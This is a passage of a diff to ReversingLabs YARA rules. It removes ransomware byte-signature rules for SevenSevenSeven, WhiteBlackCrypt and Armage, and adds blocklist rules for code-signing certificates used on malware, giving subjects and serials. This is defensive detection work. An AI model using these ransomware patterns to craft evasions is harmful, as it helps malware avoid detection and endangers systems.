66 85 D2 75 ?? 8B C3 EB ?? 1B C0 83 - C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 - ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B - C3 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? - F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 - A5 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 66 A5 6A ?? 59 BE ?? ?? ?? ?? 8D - BD ?? ?? ?? ?? F3 A5 66 A5 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 50 E8 ?? ?? - ?? ?? 59 8B F0 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? - ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? - 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? FF 75 ?? - 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 75 ?? E9 ?? ?? ?? ?? FF 75 ?? E9 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 66 39 1F 0F 84 - } - condition: - uint16(0)==0x5A4D and ($find_files and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hudson LLC" and (pe.signatures[i].serial=="00:88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" or pe.signatures[i].serial=="88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c") and 1595376000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Sevensevenseven : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE { meta: - description = "Yara rule that detects SevenSevenSeven ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "049531bd-9505-5da1-9512-980383c8c5ec" - date = "2020-07-15" - modified = "2020-07-15" + id = "72d36a5f-6599-5456-ac67-0589e37bd035" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.SevenSevenSeven.yara#L1-L148" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "583a8ac746cd749bd3927f10c864a3ac84f82f8bbd8d0ebf117e22b016d7ca94" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17180-L17198" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fffb6309355bc6764b0ab033db5964599c86c9a2f6d8985975a07f6b3ebb40ed" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "SevenSevenSeven" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $file_search_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? - ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 53 56 57 89 65 ?? BE ?? ?? ?? ?? 89 75 - ?? 33 DB 89 5D ?? 88 5D ?? 89 75 ?? 89 5D ?? 88 5D ?? 89 75 ?? 88 5D ?? 68 ?? ?? ?? - ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 53 50 8D 4D ?? E8 - ?? ?? ?? ?? BF ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? - ?? 83 C4 ?? 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 90 6A ?? 53 8D - 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? - ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? - 53 50 8D 4D ?? E8 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 39 BD ?? ?? ?? - ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? - ?? ?? 88 9D ?? ?? ?? ?? 39 7D ?? 8B 75 ?? 73 ?? 8D 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? - ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 - } - $file_search_p2 = { - 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 3B - C3 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 - ?? 8B 45 ?? 3A C3 0F 84 ?? ?? ?? ?? 50 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 3B - F3 0F 84 ?? ?? ?? ?? 39 7D ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 7D ?? 72 - ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? 39 7D - ?? 0F 82 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 E9 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 38 1E 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? - ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 89 5D ?? - 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB - ?? B8 ?? ?? ?? ?? C3 - } - $encrypt_file_1 = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ?? - 33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41 - 3B C8 72 ?? 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? - ?? ?? ?? C3 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B - F8 83 FF ?? 75 ?? 5F 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? - ?? C3 53 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 57 FF 15 ?? ?? ?? ?? 5B 5F - 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 6A ?? FF 15 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 53 56 - 57 FF 15 ?? ?? ?? ?? 33 C0 85 DB 76 ?? 8D 49 ?? 80 34 30 ?? 40 3B C3 72 ?? 6A ?? 6A - ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 53 56 57 FF 15 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 0F B7 4C 24 ?? 0F B7 - 54 24 ?? 68 ?? ?? ?? ?? 50 0F B7 44 24 ?? 51 0F B7 4C 24 ?? 52 0F B7 54 24 ?? 50 51 - 52 55 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 55 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B - 8C 24 ?? ?? ?? ?? 5B 5F 5E B8 ?? ?? ?? ?? 5D E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_file_2 = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ?? - 33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41 - 3B C8 72 ?? 83 FE ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? - ?? ?? ?? 8B F0 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 - ?? ?? ?? ?? C3 53 6A ?? 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 56 FF 15 ?? ?? ?? - ?? 5B 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 57 8D 83 - ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8B F8 FF 15 ?? ?? ?? ?? - 6A ?? 8D 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 8B CB C1 E9 ?? 41 74 ?? 8D 47 ?? B2 - ?? 80 70 ?? ?? 80 70 ?? ?? 80 30 ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? - 30 50 ?? 83 C0 ?? 49 75 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? - 52 53 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? - 0F B7 4C 24 ?? 0F B7 54 24 ?? 0F B7 44 24 ?? 68 ?? ?? ?? ?? 51 0F B7 4C 24 ?? 52 0F - B7 54 24 ?? 50 0F B7 44 24 ?? 51 52 50 55 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? - ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 - ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5B 5E B8 ?? ?? ?? ?? 5D E8 - ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $remote_server_1 = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 56 57 68 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 33 FF 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB - BD ?? ?? ?? ?? 8B 44 24 ?? BA ?? ?? ?? ?? 8B CB D3 E2 85 D0 0F 84 ?? ?? ?? ?? 8A CB - 8D 54 24 ?? 80 C1 ?? 52 88 4C 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 44 - 24 ?? 50 FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D - 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 4C 24 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 - 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 44 24 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? - ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? - ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 - } - $remote_server_2 = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 57 33 FF 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 84 - 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ?? - 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 87 ?? ?? ?? ?? 53 55 56 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? - 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB BD ?? ?? - ?? ?? 8B CB B8 ?? ?? ?? ?? D3 E0 8B 4C 24 ?? 85 C1 0F 84 ?? ?? ?? ?? 8A D3 8D 44 24 - ?? 80 C2 ?? 50 88 54 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 4C 24 ?? 51 - FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D 50 ?? 8A - 08 40 84 C9 75 ?? 2B C2 50 8D 54 24 ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 6A - ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? - ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? ?? ?? E8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B - 8C 24 ?? ?? ?? ?? 5E 5D 5B 33 C0 5F E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 ?? ?? 57 FF - 15 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Mapping OOO" and (pe.signatures[i].serial=="00:a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" or pe.signatures[i].serial=="a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30") and 1618963200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "52cdf082-7212-53e6-9e55-b86153e6afe8" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17200-L17216" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8fd406004b634e4826659b1dff88c61074fd321969b9fd63ea45d8e9608b35f1" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($file_search_p*)) and ((($encrypt_file_1) and ($remote_server_1)) or (($encrypt_file_2) and ($remote_server_2))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures[i].serial=="52:5b:55:29:db:20:d1:7a:85:be:28:4d:6b:79:52:ea" and 1508198400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Whiteblackcrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE { meta: - description = "Yara rule that detects WhiteBlackCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9855c10d-563d-54e0-bc79-945daef947de" - date = "2021-07-05" - modified = "2021-07-05" + id = "98c19385-555e-5827-b03c-59645ad2a101" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.WhiteBlackCrypt.yara#L1-L91" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "37b95cc3412f2f2d02d19c4c15b529c4f67453cb195627b5bab2f353e7602354" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17218-L17234" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "017eed878daf706eb96b638a8d1f4428466bc1d00ce27f32628bd249a658a813" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WhiteBlackCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 41 57 41 56 41 55 41 54 55 57 56 53 48 83 EC ?? 4C 8D 3D ?? ?? ?? ?? 45 31 F6 49 89 - CD E8 ?? ?? ?? ?? 48 85 C0 49 89 C4 0F 84 ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 - C0 0F 84 ?? ?? ?? ?? 48 8D 68 ?? 4C 89 FA 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D - 15 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 85 C0 74 ?? 44 89 F0 48 83 C9 ?? 48 89 EF F2 - AE 4C 89 EF 48 89 CB 48 83 C9 ?? F2 AE 48 F7 D3 48 F7 D1 01 D9 48 63 D9 48 89 D9 E8 - ?? ?? ?? ?? 48 89 D9 4C 89 EA 48 89 C6 48 89 C7 44 89 F0 F3 AA 48 89 F1 E8 ?? ?? ?? - ?? 48 8D 15 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 48 89 EA 48 89 F1 E8 ?? ?? ?? ?? 48 - 89 F1 E8 ?? ?? ?? ?? 48 89 F1 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 89 - F1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 E1 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E - 41 5F E9 ?? ?? ?? ?? 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D 41 5E 41 5F C3 - } - $encrypt_files = { - 41 55 41 54 55 57 56 53 48 83 EC ?? 48 8D 15 ?? ?? ?? ?? 31 F6 4C 8D 2D ?? ?? ?? ?? - 48 89 CD E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C3 E8 ?? ?? ?? ?? 48 89 C7 49 89 D9 41 - B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 85 C0 49 89 C4 74 ?? 81 FE ?? - ?? ?? ?? 7F ?? 45 89 E0 48 89 FA 4C 89 E9 E8 ?? ?? ?? ?? 45 31 C0 89 F2 48 89 D9 E8 - ?? ?? ?? ?? 44 01 E6 4D 63 C4 48 89 F9 49 89 D9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 45 31 - C0 89 F2 48 89 D9 E8 ?? ?? ?? ?? EB ?? 48 89 F9 48 89 EF E8 ?? ?? ?? ?? 48 89 D9 E8 - ?? ?? ?? ?? 31 C0 48 83 C9 ?? F2 AE 48 89 CE 48 F7 D6 48 89 F1 48 83 C1 ?? E8 ?? ?? - ?? ?? 48 89 EA 48 89 C1 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 89 E9 48 89 C2 48 83 C4 ?? 5B 5E 5F 5D 41 5C 41 5D E9 - } - $register_service_p1 = { - 57 56 53 48 81 EC ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 31 C0 41 B9 ?? ?? ?? ?? 48 8D 94 - 24 ?? ?? ?? ?? 48 89 CB B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 D7 F3 AB 48 8D - 44 24 ?? 48 89 54 24 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 - C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 48 8B 35 ?? ?? ?? - ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 41 B8 ?? ?? ?? ?? 48 89 DA FF 15 - ?? ?? ?? ?? 48 8D 44 24 ?? 45 31 C0 41 B9 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 15 ?? ?? - ?? ?? 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8D 05 ?? ?? ?? ?? 48 8B - 4C 24 ?? 41 B9 ?? ?? ?? ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 - 89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? - 45 31 C0 48 89 D9 FF 15 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 31 C9 FF D6 48 85 C0 79 ?? - B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 31 C9 BA ?? ?? - ?? ?? 48 C1 E0 ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? - ?? 48 8D 35 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 48 8D - } - $register_service_p2 = { - 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 - 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 41 B9 ?? ?? ?? ?? 48 89 F2 48 89 1D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? - 48 8B 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? - ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D6 B9 ?? ?? ?? ?? 48 89 C3 FF 15 ?? - ?? ?? ?? BA ?? ?? ?? ?? 48 89 D9 49 89 C0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D - 54 24 ?? 48 89 C1 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 41 B9 ?? ?? - ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? - ?? ?? ?? ?? 48 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? 99 F7 F9 2D ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 99 F7 F9 31 C9 48 8D 15 ?? ?? ?? - ?? 2D ?? ?? ?? ?? 89 44 24 ?? FF D6 BA ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 - D9 FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8D 5C 24 ?? 45 31 C9 45 31 C0 31 D2 48 - 89 D9 FF D6 85 C0 74 ?? 48 89 D9 FF 15 ?? ?? ?? ?? 48 89 D9 FF 15 ?? ?? ?? ?? EB ?? - 8B 84 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5E 5F C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($register_service_p*)) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="70:ae:0e:51:7d:2e:f6:d5:ee:d0:6b:56:73:0a:1a:9a" and 1475193600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Armage : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE { meta: - description = "Yara rule that detects Armage ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "94cf639b-7d9e-51ca-b547-e0d591581df2" - date = "2020-07-15" - modified = "2020-07-15" + id = "47207784-5aee-5fa3-bed9-2c12d9932c38" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Armage.yara#L1-L128" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = 